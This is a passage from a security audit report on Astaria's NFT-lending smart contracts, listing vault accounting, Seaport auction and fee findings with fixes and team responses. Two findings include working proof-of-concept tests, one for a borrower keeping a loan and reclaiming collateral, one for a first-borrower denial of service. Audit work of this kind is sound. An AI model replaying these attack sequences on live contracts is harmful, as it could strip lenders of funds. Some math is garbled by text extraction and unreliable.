take the profit to repay the flash loan. Note that the project team has stated clearly that UNI_V3Validator will not be used before the audit. This issue is filed to provide information to the codebase. Recommendation: Fetch price from a reliable price oracle instead of slot0. Also, it is recommended to document the risk of UNI_V3Validator in the codebase or documentation. 30 +5.3.4 Users pay protocol fee for interests they do not get Severity: Medium Risk Context: PublicVault.sol#L629-L642 Description: The PublicVault._handleStrategistInterestReward() function currently charges a protocol fee from minting vault shares, affecting all vault LP participants. However, not every user receives interest payments. Consequently, a scenario may arise where a user deposits funds into the PublicVault before a loan is repaid, resulting in the user paying more in protocol fees than the interest earned. This approach appears to be unfair to certain users, leading to a disproportionate fee structure for those who do not benefit from the interest rewards. Recommendation: This is an edge case where in certain cases, users may lose money from providing LP. The root cause of this is the way PublicVault values the total assets considered the interests being paid evenly according to the time. However, the protocol fee is charged when the payment is made. PublicVault.totalAssets function _totalAssets(VaultData storage s) internal view returns (uint256) { uint256 delta_t = block.timestamp - s.last; return uint256(s.slope).mulDivDown(delta_t, 1) + uint256(s.yIntercept); } There are three potential paths to address this issue: 1. Acknowledge the risks and inform users of the risks. 2. Change the way PublicVault record the interests. Distributes the interest to all vault lp when the payment is made. This is the design most yield aggregation vaults adopt. The totalAssets only increases when the protocol gets the money. The design can be cleaner this way. function _totalAssets(VaultData storage s) internal view returns (uint256) { return uint256(s.yIntercept); } } function updateVault(UpdateVaultParams calldata params) external { _onlyLienToken(); VaultData storage s = _loadStorageSlot(); _accrue(s); //we are a payment if (params.decreaseInYIntercept > 0) { _setYIntercept(s, s.yIntercept - params.decreaseInYIntercept); } else { increaseYIntercept(params.interestPaid); } _handleStrategistInterestReward(s, params.interestPaid); 3. Set the post protocol fee s.slope and transfer protocol fees to owner when a payment is made. 31 function _addLien( uint256 tokenId, uint256 lienSlope, uint40 lienEnd ) internal { VaultData storage s = _loadStorageSlot(); _accrue(s); lienSlope = uint256 newSlope = s.slope + lienSlope; lienSlope.mulWadDown(1e18 - VAULT_FEE()); + _setSlope(s, newSlope); uint64 epoch = getLienEpoch(lienEnd); _increaseOpenLiens(s, epoch); emit LienOpen(tokenId, epoch); } Astaria: Based on our research we will accept option 1 as the recommendation. Attempted a toy implementation that involved keeping the strategist reward off the books until repayment or liquidation. Such an implementation requires a significant overhaul of the code base. Spearbit: Acknowledged. +5.3.5 Incorrect fee calculation in_handleStrategistInterestReward resulting in undercharged fees in Pub- licVault Severity: Medium Risk Context: LienToken.sol#L392-L430 Description: In the PublicVault contract, the function _handleStrategistInterestReward is being called during the makePayment process. However, it has been observed that the TotalAssets of the PublicVault does not change in makePayment, assuming it is a normal payment scenario. _mint(owner(), feeInShares); would result in a smaller fee collection by the protocol. Assume totalAssets = 2000 and interestPaid = 1000 and Vault_FEE = 50% totalSupply totalAssets protocolFee protocolShares pricePerShare t0 t1 t2 1,000 1,000 1,250 2000 2000 2000 -- 500 500 -- 500 / 2 = 250 250 2 - 1.6 While the protocol should collect 500$, it only collects 250 * 1.6 = 400 uint256 feeInShares = fee.mulDivDown(totalSupply(), totalAssets() - fee); // instead of uint256 feeInShares = fee.mulDivDown(totalSupply(), totalAssets()); Astaria: Fixed in PR 350. Spearbit: Verified. 32 +5.3.6 Seaport auctions not compatible with USDT Severity: Medium Risk Context: CollateralToken.sol#L173 Description: As per ERC20 specification, approve() returns a boolean function approve(address _spender, uint256 _value) public returns (bool success) However, USDT deviates from this standard and it's approve() method doesn't have a return value. Hence, if USDT is used as a payment token, the following line reverts in validateOrder() as it expects return data but doesn't receive it: paymentToken.approve(address(transferProxy), s.LIEN_TOKEN.getOwed(stack)); Recommendation: Use solmate's safeApprove() function to accommodate USDT's approve() paymentToken.safeApprove(address(transferProxy), s.LIEN_TOKEN.getOwed(stack)); Astaria: Fixed in PR339. Spearbit: Verified. +5.3.7 Borrowers cannot provide slippage protection parameters when committing to a lien Severity: Medium Risk Context: • AstariaRouter.sol#L497-L504 Description: When a borrower commits to a lien, AstariaRouter calls the strategy validator to fetch the lien details (bytes32 leaf, ILienToken.Details memory details) = IStrategyValidator( strategyValidator ).validateAndParse( commitment.lienRequest, msg.sender, commitment.tokenContract, commitment.tokenId ); details include rate, duration, liquidationInitialAsk: struct Details { uint256 maxAmount; uint256 rate; //rate per second uint256 duration; uint256 maxPotentialDebt; // not used anymore uint256 liquidationInitialAsk; } The borrower cannot provide slippage protection parameters to make sure these 3 values cannot enter into some undesired ranges. Recommendation: Allow the borrower to provide slippage protection parameters to prevent the details param- eters to be set to some undesired values. • rate: borrower provides upper bound. • duration: borrower can provide lower and upper bound. Lower bound protection would be more important. 33 • liquidationInitialAsk: borrower can provide lower and upper bound. The protocol still checks that this value is not less than the to-be-owed amount at the end of the lien's term. +5.3.8 The liquidation's auction starting price is not chosen perfectly Severity: Medium Risk Context: • AstariaRouter.sol#L703 Description: When a lien is expired and liquidated the starting price for its Seaport auction is chosen as stack.lien.details.liquidationInitialAs. It would make more sense to have the startingPrice to be the maximum of the amount owed up to now and the stack.lien.details.liquidationInitialAsk ps = max(Lin, aowed ) For example if the liquidate(...) endpoint is called way after the lien's expiration time the amount owed might be bigger than the stack.lien.details.liquidationInitialAsk. When a lien is created the protocol checks that stack.lien.details.liquidationInitialAsk is not smaller than the to-be-owed amount at the end of the lien's term. But the lien can keep accruing interest if it is not liquidated right away when it gets expired. Recommendation: Use the recommendation above and set startingPrice as uint256 startingPrice = Math.max( stack.lien.details.liquidationInitialAsk, s.LIEN_TOKEN.getOwed(stack) ); Astaria: Fixed in PR 337. Spearbit: Fixed. +5.3.9 Canceled Seaport auctions can still be claimed by the liquidator Severity: Medium Risk Context: • CollateralToken.sol#L263-L271 • AstariaRouter.sol#L696 Description: Canceled auctions can still be claimed by the liquidator if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, counterAtLiquidation)) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } If in the future we would add an authorised endpoint that could call s.SEAPORT.incrementCounter() to cancel all outstanding NFT auctions, the liquidator can call this endpoint liquidatorNFTClaim(..., counterAtLiq- uidation) where counterAtLiquidation is the old counter to claim its NFT after the canceled Seaport auction ends. Recommendation: Make sure to use the current Seaport counter when authenticating an auction hash 34 if ( s.idToUnderlying[collateralId].auctionHash != s.SEAPORT.getOrderHash(getOrderComponents(params, s.SEAPORT.getCounter(address(this))) ) { //revert auction params don't match revert InvalidCollateralState( InvalidCollateralStates.INVALID_AUCTION_PARAMS ); } Astaria: The goal was to allow the case where non cancelled auctions(expired) could be still retrieved, theres no interest in incrementing nonces. Recommendation applied in PR 343. Spearbit: Fixed. +5.3.10 The risk of bad debt is transferred to the non-redeeming shareholders and not the redeeming holders Severity: Medium Risk Context: • PublicVault.sol#L373-L379 • PublicVault.sol#L411 Description: Right before a successful epochProcess(), the total assets A equals to + P(s,tl )2U2 a(s, tl ) A = y0 + s(t (cid:0) tlast ) = B + a(s, t) X s2U1 All the parameter values in the below table are considered as just before calling the processEpoch() endpoint unless stated otherwise. • A | totalAssets() | • y0 | yIntercept | • s | slope | • tlast | lasttimestamp used to update y0 or s | • t | block.timestamp | • B | ERC20(asset()).balanceOf(PublicVault), underlying balance of the public vault | • U1 | The set of active liens/stacks owned by the PublicVault, this can be non-empty due to how long the lien durations can be | • U2 | The set of liquidated liens/stacks and their corresponding liquidation timestamp ( tl ) which are owned by the current epoch's WithdrawProxy Wecurr . These liens belong to the current epoch, but their auction ends in the next epoch duration. | • a(s, t) | total amount owned by the stack s up to the timestamp t. • S | totalSupply(). • SW | number of shares associated with the current epoch's WithdrawProxy ,currentWithdrawProxy.totalSupply() | • E | currentWithdrawProxy.getExpected(). 35 0 | yIntercept after calling epochProcess(). • wr | withdrawReserve this is the value after calling epochProcess(). • y 0 • tp | last after calling epochProcess(). • A0 | totalAssets after calling epochProcess(). • Wn | the current epoch's WithdrawProxy before calling epochProcess(). • Wn+1 | the current epoch's WithdrawProxy after calling epochProcess(). Also assume that claim() was already called on the previous epoch's WithdrawProxy if needed. After the call to epochProcess() (in the same block), we would have roughly (not considering the division errors) A0 = y 0 0 + s(t (cid:0) tp) A0 = (1 (cid:0) SW S )A + X s2U1 (a(s, t) (cid:0) a(s, tp)) wr = ( SW S ) B + a(s, tp) X s2U1 A = A0 + wr + ( SW S ) X (s,tl )2U2 a(s, tl ) (cid:0)(cid:1)A = wr + ( SW S )E and so: To be able to call processEpoch() again we need to make sure wr tokens have been transferred to Wn either from the public vault's assets B or from Wn+1 assets. Note that at this point wr equals to wr = SW S B + SW S X s2U1 a(s, tp) SW S B is an actual asset and can be transferred to Wn right away. The The a(s, tp) portion is a percentage of the amount owed by active liens at the time the processEpoch() was called. Depending on whether these liens get paid fully or not we would have: SW S Ps2U1 • If they get fully paid there are no risks for the future shareholders to bare. • If these liens are not fully paid since we have transferred a(s, tp) from the actual asset balance to Wn the redeeming shareholder would not take the risk of these liens getting liquidated for less than their value. But these risks are transferred to the upcoming shareholders or the shareholders who have not redeemed their positions yet. SW S Ps2U1 Recommendation: The above should be noted for the users and also documented. To safeguard perhaps we should define wr = SW S B 36 and only transfer the portions of the exited liens to Wn that corresponds to changes to the accounting of the WithdrawProxy and potentially delay the withdraw shares a bit further. a(s, tp). This would require SW S Ps2U1 +5.3.11 validateOrder(...) does not check the consideration amount against its token balance Severity: Medium Risk Context: • CollateralToken.sol#L158 Description: When a lien position gets liquidated the CollateralToken creates a full restricted Seaport auction with itself as both the offerer and the zone. This will cause Seaport to do a callback to the CollateralToken's validateOrder(...) endpoint at the end of order fulfilment/matching. In this endpoint we have: uint256 payment = zoneParameters.consideration[0].amount; This payment amount is not validated. Recommendation: Make sure 1. ERC20(zoneParameters.consideration[0].token).balanceOf(CollateralToken) is at least the payment amount. 2. Inherit from seaport-core/../AmountDeriver and call _locateCurrentAmount(...) and derive the correct amount based on the start/end timestamp/amounts and compare to payment. Astaria: Fixed in PR 337. Spearbit: Fixed. +5.3.12 If the auction window is 0, the borrower can keep the lien amount and also take back its collater- alised NFT token Severity: Medium Risk Context: • AstariaRouter.sol#L300-L302 • CollateralToken.sol#L527 • seaport-core/src/lib/OrderValidator.sol#L677 • seaport-core/src/lib/Verifiers.sol#L58 Description: If an authorised entity would file to set the auctionWindow to 0, borrowers can keep their lien amount and also take back their collateralised NFT tokens. Below is how this type of vulnerability works. 1. A borrower takes a lien from a vault by collateralising its NFT token. 2. Borrower let the time pass so that its lien/stack position can be liquidated. 3. The borrower atomically liquidates and then calls the liquidatorNFTClaim(...) endpoint of the Collater- alToken. The timestamps are as follows: s (cid:20) t lien t lien e = t auction s = t auction e We should note that in step 3 above when the borrower liquidates its own position, the CollateralToken creates a Seaport auction by calling its validate(...) endpoint. But this endpoint does not validate the orders timestamps so even though the timestamps provided are not valid when one tries to fulfil/match the order since Seaport requires that t auction . Thus, in . So it is not possible to fulfil/match an order where t auction (cid:20) tnow < t auction = t auction e e s s 37 step 3 it is not needed to call liquidatorNFTClaim(...) immediately as the auction created cannot be fulfilled by anyone. // add the following test case to // file: src/test/LienTokenSettlementScenarioTest.t.sol function _createUser(uint256 pk, string memory label) internal returns(address addr) { uint256 ownerPK = uint256(pk); addr = vm.addr(ownerPK); vm.label(addr, label); } function testScenario14() public { // allow flash liens - liens that can be liquidated in the same block that was committed IAstariaRouter.File[] memory files = new IAstariaRouter.File[](1); files[0] = IAstariaRouter.File( IAstariaRouter.FileType.AuctionWindow, abi.encode(uint256(0)) ); ASTARIA_ROUTER.fileBatch(files); console2.log("[+] set auction window to 0."); { } { address borrower1 = _createUser(0xb055033501, "borrower1"); address vaultOwner = _createUser(0xa77ac3, "vaultOwner"); address publicVault = _createPublicVault(vaultOwner, vaultOwner, 14 days); vm.label(publicVault, "publicVault"); console2.log("[+] public vault is created: %s", publicVault); console2.log("vault start: %s", IPublicVault(publicVault).START()); skip(14 days); _lendToVault( Lender({addr: vaultOwner, amountToLend: 10 ether}), payable(publicVault) ); TestNFT nft1 = new TestNFT(1); address tokenContract1 = address(nft1); uint256 tokenId1 = uint256(0); nft1.transferFrom(address(this), borrower1, tokenId1); vm.startPrank(borrower1); (uint256 lienId,ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: vaultOwner, strategistPK: 0xa77ac3, tokenContract: tokenContract1, tokenId: tokenId1, lienDetails: ILienToken.Details({ maxAmount: 2 ether, rate: 1e8, duration: 1 hours, maxPotentialDebt: 0 ether, liquidationInitialAsk: 10 ether }), amount: 2 ether, 38 revertMessage: "" }); console2.log("ETH balance of the borrower: %s", borrower1.balance); skip(1 hours); console2.log("[+] lien created with 0 duration. lineId: %s", lienId); OrderParameters memory params = _liquidate(stack); console2.log("[+] lien liquidated by the borrower."); COLLATERAL_TOKEN.liquidatorNFTClaim( stack, params, COLLATERAL_TOKEN.SEAPORT().getCounter(address(COLLATERAL_TOKEN)) ); console2.log("[+] liquidator/borrower claimed NFT.\n"); vm.stopPrank(); console2.log("owner of the NFT token: %s", nft1.ownerOf(tokenId1)); console2.log("ETH balance of the borrower: %s", borrower1.balance); assertEq( nft1.ownerOf(tokenId1), borrower1, "the borrower should own the NFT" ); assertEq( borrower1.balance, 2 ether, "borrower should still have the lien amount." ); } } forge t --mt testScenario14 --ffi -vvv: [+] set auction window to 0. [+] public vault is created: 0x4430c0731d87768Bf65c60340D800bb4B039e2C4 vault start: 1 ETH balance of the borrower: 2000000000000000000 [+] lien created with 0 duration. lineId: ,! [+] lien liquidated by the borrower. [+] liquidator/borrower claimed NFT. 91310819262208864484407122336131134788367087956387872647527849353935417268035 owner of the NFT token: 0xA92D072d39E6e0a584a6070a6dE8D88dfDBae2C7 ETH balance of the borrower: 2000000000000000000 Recommendation: Make sure auctionWindow cannot be set to 0 by anyone. Also, it might be best to define a hard coded lower bound and make sure auctionWindow cannot be set lower than that value. 39 +5.3.13 A malicious collateralized NFT token can block liquidation and also epoch processing for public vaults Severity: Medium Risk Context: • CollateralToken.sol#L523-L526 • PublicVault.sol#L353-L357 Description: When a lien gets liquidated, the CollateralToken tries to create a Seaport auction for the underlying token. One of the steps in this process is to give approval for the token id to the CollateralToken's conduit ERC721(orderParameters.offer[0].token).approve( s.CONDUIT, orderParameters.offer[0].identifierOrCriteria ); A malicious/compromised ERC721(orderParameters.offer[0].token) can take advantage of this step and revert the approve(...). There are few consequences for this with the last being the most important one 1. One would not be able to liquidate the expired lien. 2. Because of 1. the epoch processing for a corresponding public vault will be halted, since one can only process the current epoch if all of its open liens are paid for or liquidated: if (s.epochData[s.currentEpoch].liensOpenForEpoch > 0) { revert InvalidVaultState( InvalidVaultStates.LIENS_OPEN_FOR_EPOCH_NOT_ZERO ); } 1. The strategist or the public vault owner/delegate needs to make sure to only sign roots of the trees with the leaves such that their corresponding ERC721 tokens have been thoroughly checked to make sure they would not be able to revert the approve call. 2. Or, one can move the approval to the conduit step to when a lien is committed to / opened. This way if the call reverts a lien is not created so that the epoch processing for the public vault would not be able to be halted. This come some risks since the conduit would hold the token approval for a longer period compared to the current implementation where it only has the approval during the liquidation phase. 5.4 Low Risk +5.4.1 An owner might not be able to cancel all signed liens by calling incrementNonce() Severity: Low Risk Context: • VaultImplementation.sol#L87-L94 Description: If the vault owner or the delegate is phished into signing terms with consecutive nonces in a big range, they would not be able to cancel all those terms with the current incrementNonce() implementation as this value is only incrementing the nonce one at a time. As an example Seaport increments their counters using the following formula n += blockhash(block.number - 1) << 0x80; Recommendation: It might be best to implement a similar nonce update like Seaport to avoid this issue. Astaria: Recommendation applied in PR 314. Spearbit: Fixed. 40 +5.4.2 Borrower can borrow more than totalAssets from PublicVault Severity: Low Risk Context: PublicVault.sol#L468-L495 Description: Presently, the PublicVault contract lacks a mechanism to keep track of the total borrow amount within the contract. As a result, it does not trigger a revert when the borrowed amount exceeds the available totalAssets. This creates a peculiar edge case where a user can transfer tokens to the PublicVault and proceed to borrow an amount greater than the totalAssets. Consequently, the PublicVault enters an "overborrowed loan" scenario. For instance, assuming the total asset of a PublicVault is 100 ETH, a user can transfer 200 ETH into the Pub- licVault and then take out a 200 ETH loan. This "donated loan" has several implications: • It increases the yield of all vault LP participants. • It serves as a buffer for the Vault when LP participants redeem their shares. However, this donated loan also poses challenges for the LP: • LP has no means to redeem the donated LP as it does not alter the total assets. • In the event the donated loan is liquidated, the vault LP participants will bear the liability. Assuming the donated loan is liquidated with a 50 ETH deficit; the Vault will get cut 50 ETH. The absence of proper validation and handling of such donated loans may lead to unfair situations and unintended consequences, affecting both the protocol's health and the interests of LP participants. Malicious actor can potentially DOS the vault as a first borrower. The borrower can borrow a loan when totalAssets is equal to 0. The first borrower can do the following things to DOS the vault. Assume a publicVault that charges protocol fee. 1. Transfer a small WETH balance to the publicVault. 2. Borrow a dust amount from the publicVault. 3. Borrow a small WETH balance. 4. Repay the dust loan. The protocol fee being charged is very small. publicVault._handleStrategistIn- terestReward(...) mints vault share to the owner. The publicVault.totalSupply becomes very small while the interests of the second loan keep accruing. The vault price( totalAssets totalSupply ) becomes large. 5. The following depositor would not be able to deposit. The attack described in the paragraph does not lead to a profitable attack nor does it pose threats to real users. However, it does show that borrowing amounts that are larger than totalAssets can lead to weird states that haven't been well studied. This is a potential issue that should be investigated further if we allow borrowing when totalAssets is equal to 0. forge test --mt testBypassMinDeposit --ffi function testFirstBorrowerAttack() public { TestNFT nft = new TestNFT(3); address tokenContract = address(nft); uint256 tokenId = uint256(1); uint256 tokenId2 = uint256(2); // @audit: create a public vault that charges vaultFee address payable publicVault = _createPublicVault({ strategist: strategistOne, delegate: strategistTwo, epochLength: 14 days, vaultFee: 10e17 }); 41 // Donated a fraction of assets into the vault WETH9.deposit{value: 1 ether}(); WETH9.transfer(publicVault, 1 ether); (, ILienToken.Stack memory stack) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId, lienDetails: standardLienDetails, amount: 1000000 }); ILienToken.Details memory lienDetails = standardLienDetails; lienDetails.maxAmount = 100 ether; (, ILienToken.Stack memory stack2) = _commitToLien({ vault: payable(publicVault), strategist: strategistOne, strategistPK: strategistOnePK, tokenContract: tokenContract, tokenId: tokenId2, lienDetails: lienDetails, amount: 1 ether - 1000000 }); vm.warp(block.timestamp + 30); REPAYMENT_HELPER.makePayment{value: 2000000 ether}(stack); assertEq(PublicVault(publicVault).totalSupply(), 1); // totalSupply == 1. vm.warp(block.timestamp + 1 days); // totalAsset accrues while the total supply is 1 wei WETH9.deposit{value: 100 ether}(); WETH9.approve(address(TRANSFER_PROXY), 100 ether); vm.expectRevert("VALUE_TOO_SMALL"); ASTARIA_ROUTER.depositToVault( PublicVault(payable(publicVault)), address(msg.sender), 100 ether, 0 ); } 42 +5.4.3 Error handling for USDT transactions in TransferProxy Severity: Low Risk Context: TransferProxy.sol#L74C1-L85 Description: To handle edge cases where the receiver is blacklisted, TransferProxy.tokenTransferFromWithErrorReceiver(...) is designed to catch errors that may occur during the first transfer attempt and then proceed to send the tokens to the error receiver. try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } However, it's worth noting that this approach may not be compatible with non-standard ERC20 tokens (e.g., USDT) that do not return any value after a transferFrom operation. The try-catch pattern in Solidity can only catch errors resulting from reverted external contract calls, but it does not handle errors caused by inconsistent return values. Consequently, when using USDT, the entire transaction will revert. Recommendation: We can make a slight modification to the safeTransferLib to handle reverts from external contract calls while remaining compatible with USDT. function trySafeTransferFrom( ERC20 token, address from, address to, uint256 amount ) internal returns(bool success){ assembly { // Get a pointer to some free memory. let freeMemoryPointer := mload(0x40) // Write the abi-encoded calldata into memory, beginning with the function selector. mstore(freeMemoryPointer, 0x23b872dd00000000000000000000000000000000000000000000000000000000) mstore(add(freeMemoryPointer, 4), from) // Append the "from" argument. mstore(add(freeMemoryPointer, 36), to) // Append the "to" argument. mstore(add(freeMemoryPointer, 68), amount) // Append the "amount" argument. success := and( // Set success to whether the call reverted, if not we check it either // returned exactly 1 (can't just be non-zero data), or had no return data. or(and(eq(mload(0), 1), gt(returndatasize(), 31)), iszero(returndatasize())), // We use 100 because the length of our calldata totals up like so: 4 + 32 * 3. // We use 0 and 32 to copy up to 32 bytes of return data into the scratch space. // Counterintuitively, this call must be positioned second to the or() call in the // surrounding and() call or else returndatasize() will be zero during the computation. call(gas(), token, 0, freeMemoryPointer, 100, 0, 32) ) } // Do not revert the transaction when it fails. Return the state instead. // require(success, "TRANSFER_FROM_FAILED"); } function tokenTransferFromWithErrorReceiver( address token, address from, address to, uint256 amount ) external requiresAuth { 43 if (!trySafeTransferFrom(token, from, to, amount)) { _transferToErrorReceiver(token, from, to, amount); } } Please note that this approach may reduce the codebase's readability. Consider whether you want to support edge cases where the receiver is blacklisted. Astaria: Fixed in PR 339. Spearbit: Verified. +5.4.4 PublicVault does not handle funds in errorReceiver Severity: Low Risk Context: LienToken.sol#L392-L430 During LienToken loan attempting repayment pull Description: involves PROXY.tokenTransferFromWithErrorReceiver. The implementation in the TransferProxy contract involves sending the tokens to an error receiver that is con- trolled by the original receiver. However, this approach can lead to accounting errors in the PublicVault as PublicVault does not pull tokens from the error receiver. process transferProxy.TRANSFER_- LienToken.MakePayment(...), function from the in the tokens using user the to function tokenTransferFromWithErrorReceiver( // ... ) { try ERC20(token).transferFrom(from, to, amount) {} catch { _transferToErrorReceiver(token, from, to, amount); } } Note that, in practice, tokens would not be transferred to the error receiver. The issue is hence considered to be a low-risk issue. Recommendation: PROXY.tokenTransferFromWithErrorReceiver. Use TRANSFER_PROXY.tokenTransferFrom instead of transferProxy.TRANSFER_- +5.4.5 Inconsistent Vault Fee Charging during Loan Liquidation via WithdrawProxy Severity: Low Risk Context: WithdrawProxy.sol#L288-L337, PublicVault.sol#L553-L569 Description: In the smart contract code of PublicVault, there is an inconsistency related to the charging of fees when a loan is liquidated at epoch's roll and the lien is sent to WithdrawProxy. The PublicVault.owner is supposed to take a ratio of the interest paid as the strategist's reward, and the fee should be charged when a payment is made in the function PublicVault.updateVault(...), regardless of whether it's a normal payment or a liquidation payment. It appears that the fee is not being charged when a loan is liquidated at epoch's roll and the lien is sent to With- drawProxy. This discrepancy could potentially lead to an inconsistent distribution of fees and rewards. Recommendation: Handle strategist reward fee in WithdrawProxy.claim(...). Astaria: Acknowledged. Spearbit: Acknowledged. 44 +5.4.6 VaultImplementation.init(...) silently initialised when the allowlist parameters are not throughly validated Severity: Low Risk Context: • VaultImplementation.sol#L183-L192 Description: In VaultImplementation.init(...), if params.allowListEnabled is false but params.allowList is not empty, s.allowList does not get populated. Recommendation: It might be best to check the above scenario and in the case it is detected to revert the transaction. +5.4.7 Several functions in AstariaRouter can be made non-payable Severity: Low Risk Context: AstariaRouter.sol#L118-L173, AstariaRouter.sol#L202 Description: Following functions in AstariaRouter are payable when they should never be sent the native token: mint(), deposit(), withdraw(), redeem(), pullToken() Recommendation: Remove the payable keyword for the highlighted functions. +5.4.8 Loan duration can be reduced at the time of borrowing without user permission Severity: Low Risk Context: AstariaRouter.sol#L889 Description: Requested loan duration, if greater than the maximum allowed duration (the time to next epoch's end), is set to this maximum value: if (timeToSecondEpochEnd < lien.details.duration) { lien.details.duration = timeToSecondEpochEnd; } This happens without explicit user permission. Recommendation: Consider reverting in this case to avoid any surprises for the borrower. made, this behavior should be documented for awareness. If no changes are +5.4.9 Native tokens sent to DepositHelper can get locked Severity: Low Risk Context: • DepositHelper.sol#L43-L45 Description: DepositHelper has the following two endpoints: fallback() external payable {} receive() external payable {} If one calls this contract by not supplying the deposit(...) function signature, the msg.value provided would get locked in this contract. Recommendation: If there isn't a plan to update this contract to use its own balance, it would be great to remove these endpoints: 45 - - fallback() external payable {} receive() external payable {} Astaria: Fixed in PR 334. Spearbit: Fixed. +5.4.10 Updated ...EpochLength values are not validated Severity: Low Risk Context: • AstariaRouter.sol#L319-L322 Description: Sanity check is missing for updated s.minEpochLength and s.maxEpochLength. Need to make sure s.minEpochLength <= s.maxEpochLength Recommendation: Make sure the updated values still hold the above invariant. Astaria: Fixed in PR 345. Spearbit: Fixed. +5.4.11 CollateralToken's conduit would have an open channel to an old Seaport when Seaport is updated Severity: Low Risk Context: • CollateralToken.sol#L343-L365 Description: After filing for a new Seaport the old Seaport would still have an open channel to it from the Col- lateralToken's conduit (assuming the old and new Seaport share the same conduit controller). Recommendation: It might be best to close the channel to the old Seaport in the same filing call. +5.4.12 CollateralToken's tokenURI uses the underlying assets's tokenURI Severity: Low Risk Context: • CollateralToken.sol#L437-L447 Description: Since the CollateralToken positions can be sold on secondary markets like OpenSea, the tokenURI endpoint should be customised to avoid misleading users and it should contain information relating to the Collat- eralToken and not just its underlying asset. It would also be great to pull information from its associated lien to include here. • What-is-OpenSea-s-copymint-policy. • docs.opensea.io/docs/metadata-standards. • Necromint got banned on OpenSea. Recommendation: Define/design a customised tokenURI for CollateralToken. Astaria: OpenSea has approved previous versions though we are planning to introduce a customized image. Fixed in PR 340 by introducing web2 endpoints for these queries. Spearbit: Fixed. 46 +5.4.13 Filing to update one of the main contract for another main contract lacks validation Severity: Low Risk Context: • AstariaRouter.sol#L402-L409 • CollateralToken.sol#L330-L332 • LienToken.sol#L87-L90 Description: The main contracts AstariaRouter, CollateralToken, and LienToken all need to be aware of each other and form a connected triangle. They are all part of a single unit and perhaps are separated into 3 different contract due to code size and needing to have two individual ERC721 tokens. Their authorised filing structure is as follows: • Note that one cannot file for CollateralToken to change LienToken as the value of LienToken is only set during the CollateralToken's initialisation. If one files to change one of these nodes and forget to check or update the links between these contract, the triangle above would be broken. Recommendation: To ensure the connectivity of the above triangle: 1. Each contract/node has two storage variables for the other 2 nodes 2. Each node should have an authorised endpoint to file update for the other 2 nodes. 3. Once a link has been established between 2 nodes the changes should be propagated to the 3rd node to ensure connectivity. One can also have a different design where there is an external contract that manages the nodes and their links: to swap one of these nodes we would 1. Each contract/node has two storage variables for the other 2 nodes 2. Each node has a restricted fileNode endpoint which accepts one or two arguments (depends on the design) for the changed/swapped nodes and only the NodeManager can call which should update the internal storage of the called node pointing to the other nodes. 3. NodeManager should have an authorised endpoint that can be called to swap one or more of the nodes which the NodeManager would need to propagate the changes to all the nodes. The new node would need to set its NodeManager upon initialisation or construction. If the above changes are not applied, we need to monitor that the triangle is intact when a node is swapped. +5.4.14 TRANSFER_PROXY is not queried in a consistent fashion. Severity: Low Risk Context: • CollateralToken.sol#L167 • LienToken.sol#L419 • AstariaRouter.sol#L204 • Deploy.sol#L84 Description: Different usages of TRANSFER_PROXY and how it is queried • AstariaRouter: Used in pullToken(...) to move tokens from the msg.sender to a another address. • CollateralToken: Used in validateOrder(...) where Seaport has callbacked into. Here Collateral- Token gives approval to TRANSFER_PROXY which is queried from AstariaRouter for the settlement tokens. TRANSFER_PROXY is also used to transfer tokens. 47 • LienToken: In _payment(...) TRANSFER_PROXY is used to transfer tokens from CollateralToken to the lien owner. This implies that the TRANSFER_PROXY used in CollateralToken should be the same that is used in LienToken. Therefore, from the above we see that: 1. TRANSFER_PROXY holds tokens approvals for ERC20 or wETH tokens used as lien tokens. 2. TRANSFER_PROXY's address should be the same at all call sites for the different contract AstariaRouter, CollateralToken and LienToken. 3. Except CollateralToken which queries TRANSFER_PROXY from AstariaRouter, the other two contract As- tariaRouter and LienToken read this value from their storage. Note that the deployment script sets assigns the same TRANSFER_PROXY to all the 3 main contracts in the codebase AstariaRouter, CollateralToken, and LienToken. Recommendation: To guarantee that TRANSFER_PROXY is the same for all the 3 contract we can redesign the codebase as follows 1. Only we can call one contract (maybe AstariaRouter ) to file an update for TRANSFER_PROXY. Upon filing this update, we would call the other two contracts to update their corresponding TRANSFER_PROXY value in storage so that this value would be in sync. This would save gas well, since when we would like to query this value we would read it from the current contract in scope compared to reading it from another contract's storage. 2. Only query the TRANSFER_PROXY from the current contract's storage. Astaria: TransferProxy is now queried from the AstariaRouter: • PR 342 • PR 342 The applied solution bears the cost of querying the transfer proxy on the users as opposed to the suggestion from the above recommendation. Spearbit: Fixed. +5.4.15 Multicall when inherited to ERC4626RouterBase does not bubble up the reverts correctly Severity: Low Risk Context: • Multicall.sol#L22-L29 Description: Multicall does not bubble up the reverts correctly. The current implementation uses the following snippet to bubble up the reverts // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/Multicall.sol pragma solidity >=0.7.6; if (!success) { // Next 5 lines from https://ethereum.stackexchange.com/a/83577 if (result.length < 68) revert(); assembly { result := add(result, 0x04) } revert(abi.decode(result, (string))); } 48 // https://github.com/AstariaXYZ/astaria-gpl/blob/.../src/ERC4626RouterBase.sol pragma solidity ^0.8.17; ... abstract contract ERC4626RouterBase is IERC4626RouterBase, Multicall { ... } This method of bubbling up does not work with new types of errors: • Panic(uint256) 0.8.0 (2020-12-16) • Custom errors introduced in 0.8.4 (2021-04-21) • ... Recommendation: To bubble up the reverts correctly we can revert like the following but requires updating the Multicall's to pragma solidity >=0.8.13 (due to using "memory-safe") assembly ("memory-safe") { if iszero(success) { revert(add(result, 32), mload(result)) } } 5.5 Gas Optimization +5.5.1 Cache VAULT().ROUTER().LIEN_TOKEN() Severity: Gas Optimization Context: WithdrawProxy.sol#L394-L399 In WithdrawProxy.onERC721Received(), VAULT().ROUTER().LIEN_TOKEN() is read twice which Description: leads to extra external calls. Recommendation: Store VAULT().ROUTER().LIEN_TOKEN() in a variable. +5.5.2 Define named constants for the keccak256 values used in computeDomainSeparator() Severity: Gas Optimization Context: • ERC20-Cloned.sol#L162-L165 Description/Recommendation: computeDomainSeparator() returns: keccak256( abi.encode( keccak256( "EIP712Domain(string version,uint256 chainId,address verifyingContract)" ), keccak256("1"), block.chainid, address(this) ) ); keccak256("1") verifyingContract)") can be made into a named contract-level constants. and 